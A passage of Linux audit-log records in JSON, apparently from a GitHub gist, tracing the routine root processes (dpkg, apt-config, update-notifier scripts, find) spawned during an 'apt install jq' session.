"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/lib/packagekit/packagekitd"
]
},
"PARENT_INFO": {
"ARGV": [
"/sbin/init",
"maybe-ubiquity"
],
"launch_time": 1632468123.993,
"ppid": 0
}
}
{
"ID": "1632470478.773:853",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7760,
"pid": 7773,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x56535c0936f0",
"0x56535c0958f0",
"0x56535c093620",
"0x56535c040010"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/lib/packagekit/packagekitd"
],
"launch_time": 1632470478.697,
"ppid": 1
}
}
{
"ID": "1632470478.777:854",
"SERVICE_START": {
"pid": 1,
"uid": 0,
"auid": 4294967295,
"ses": 4294967295,
"msg": "unit=packagekit comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success"
}
}
{
"ID": "1632470478.781:855",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7753,
"pid": 7774,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "echo",
"exe": "/usr/bin/echo",
"key": "rootcmd",
"ARGV": [
"0x55e18fe1fbd8",
"0x55e18fe1fc00",
"0x55e18fe1fcb8",
"0x7f077b9fa850"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"/bin/echo"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/bin/echo",
"inode": 787063,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/echo"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null"
],
"launch_time": 1632470478.681,
"ppid": 7752
}
}
{
"ID": "1632470478.781:856",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7752,
"pid": 7775,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x7f37c18eb5aa",
"0x7ffe41acca40",
"0x564c55113550",
"0x8"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"sh",
"-c",
"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"sh",
"-c",
"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/updat"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470478.683,
"ppid": 7575
}
}
{
"ID": "1632470478.785:857",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7775,
"pid": 7776,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "touch",
"exe": "/usr/bin/touch",
"key": "rootcmd",
"ARGV": [
"0x557369a4c958",
"0x557369a4c8b0",
"0x557369a4c8c8",
"0x7f019d9cf850"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"touch",
"/var/lib/update-notifier/dpkg-run-stamp"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/touch",
"inode": 787562,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"touch",
"/var/lib/update-notifier/dpkg-run-stamp"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true"
],
"launch_time": 1632470478.781,
"ppid": 7752
}
}
{
"ID": "1632470478.785:858",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 3,
"ppid": 7775,
"pid": 7777,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "update-motd-upd",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x557369a4c820",
"0x557369a4c8b0",
"0x557369a4c8e0",
"0x7f019d9cf850"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/bin/sh",
"-e",
"/usr/lib/update-notifier/update-motd-updates-available"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/update-notifier/update-motd-updates-available",
"inode": 793512,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"-e",
"/usr/lib/update-notifier/update-motd-updates-available"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true"
],
"launch_time": 1632470478.781,
"ppid": 7752
}
}
{
"ID": "1632470478.785:859",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7777,
"pid": 7778,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-config",
"exe": "/usr/bin/apt-config",
"key": "rootcmd",
"ARGV": [
"0x5614255746c8",
"0x561425574610",
"0x561425574638",
"0x7f168eba1850"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"apt-config",
"shell",
"StateDir",
"Dir::State"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/apt-config",
"inode": 786902,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt-config",
"shell",
"StateDir",
"Dir::State"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-e",
"/usr/lib/update-notifier/update-motd-updates-available"
],
"launch_time": 1632470478.785,
"ppid": 7775
}
}
{
"ID": "1632470478.789:860",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7778,
"pid": 7779,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x55ffa4761ba0",
"0x55ffa4761be0",
"0x7ffc5d21aa20",
"0x55ffa47560e3"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt-config",
"shell",
"StateDir",
"Dir::State"
],
"launch_time": 1632470478.785,
"ppid": 7777
}
}
{
"ID": "1632470478.793:861",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7777,
"pid": 7780,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-config",
"exe": "/usr/bin/apt-config",
"key": "rootcmd",
"ARGV": [
"0x5614255746c8",
"0x561425574610",
"0x561425574638",
"0x7f168eba1850"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"apt-config",
"shell",
"ListDir",
"Dir::State::Lists"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/apt-config",
"inode": 786902,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt-config",
"shell",
"ListDir",
"Dir::State::Lists"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-e",
"/usr/lib/update-notifier/update-motd-updates-available"
],
"launch_time": 1632470478.785,
"ppid": 7775
}
}
{
"ID": "1632470478.797:862",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7780,
"pid": 7781,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x562cc90b9ba0",
"0x562cc90bb390",
"0x7ffd2ce25c90",
"0x562cc90ae0e3"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt-config",
"shell",
"ListDir",
"Dir::State::Lists"
],
"launch_time": 1632470478.793,
"ppid": 7777
}
}
{
"ID": "1632470478.801:863",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7777,
"pid": 7782,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-config",
"exe": "/usr/bin/apt-config",
"key": "rootcmd",
"ARGV": [
"0x5614255746d8",
"0x561425574620",
"0x561425574648",
"0x7f168eba1850"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"apt-config",
"shell",
"DpkgStatus",
"Dir::State::status"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/apt-config",
"inode": 786902,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt-config",
"shell",
"DpkgStatus",
"Dir::State::status"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-e",
"/usr/lib/update-notifier/update-motd-updates-available"
],
"launch_time": 1632470478.785,
"ppid": 7775
}
}
{
"ID": "1632470478.805:864",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7782,
"pid": 7783,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x5648e085dba0",
"0x5648e085f390",
"0x7ffe60b9a5f0",
"0x5648e08520e3"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt-config",
"shell",
"DpkgStatus",
"Dir::State::status"
],
"launch_time": 1632470478.801,
"ppid": 7777
}
}
{
"ID": "1632470478.809:865",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7777,
"pid": 7784,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-config",
"exe": "/usr/bin/apt-config",
"key": "rootcmd",
"ARGV": [
"0x5614255746c8",
"0x561425574610",
"0x561425574638",
"0x7f168eba1850"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"apt-config",
"shell",
"EtcDir",
"Dir::Etc"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/apt-config",
"inode": 786902,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt-config",
"shell",
"EtcDir",
"Dir::Etc"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-e",
"/usr/lib/update-notifier/update-motd-updates-available"
],
"launch_time": 1632470478.785,
"ppid": 7775
}
}
{
"ID": "1632470478.813:866",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7784,
"pid": 7785,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x558407b86ba0",
"0x558407b86be0",
"0x7ffcd7b4f4b0",
"0x558407b7b0e3"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt-config",
"shell",
"EtcDir",
"Dir::Etc"
],
"launch_time": 1632470478.809,
"ppid": 7777
}
}
{
"ID": "1632470478.817:867",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7777,
"pid": 7786,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-config",
"exe": "/usr/bin/apt-config",
"key": "rootcmd",
"ARGV": [
"0x5614255746d8",
"0x561425574620",
"0x561425574648",
"0x7f168eba1850"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"apt-config",
"shell",
"SourceList",
"Dir::Etc::sourcelist"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/apt-config",
"inode": 786902,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt-config",
"shell",
"SourceList",
"Dir::Etc::sourcelist"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-e",
"/usr/lib/update-notifier/update-motd-updates-available"
],
"launch_time": 1632470478.785,
"ppid": 7775
}
}
{
"ID": "1632470478.821:868",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7786,
"pid": 7787,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c03c68ba0",
"0x564c03c6a390",
"0x7fff0a3def90",
"0x564c03c5d0e3"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt-config",
"shell",
"SourceList",
"Dir::Etc::sourcelist"
],
"launch_time": 1632470478.817,
"ppid": 7777
}
}
{
"ID": "1632470478.825:869",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7777,
"pid": 7788,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "find",
"exe": "/usr/bin/find",
"key": "rootcmd",
"ARGV": [
"0x5614255752f0",
"0x561425575208",
"0x561425575260",
"0x73"
]
},
"EXECVE": {
"argc": 10,
"ARGV": [
"find",
"/var/lib/apt/lists/",
"/etc/apt/sources.list",
"//var/lib/dpkg/status",
"-type",
"f",
"-newer",
"/var/lib/update-notifier/updates-available",
"-print",
"-quit"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/find",
"inode": 787084,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"find",
"/var/lib/apt/lists/",
"/etc/apt/sources.list",
"//var/lib/dpkg/status",
"-type",
"f",
"-newer",
"/var/lib/update-notifier/updates-available",
"-"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-e",
"/usr/lib/update-notifier/update-motd-updates-available"
],
"launch_time": 1632470478.785,
"ppid": 7775
}
}
{
"ID": "1632470478.825:870",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7789,
"pid": 7790,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dirname",
"exe": "/usr/bin/dirname",
"key": "rootcmd",
"ARGV": [
"0x561425574700",
"0x561425574658",
"0x561425574670",
"0x73"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"dirname",
"/var/lib/update-notifier/updates-available"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dirname",
"inode": 787048,
"d
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment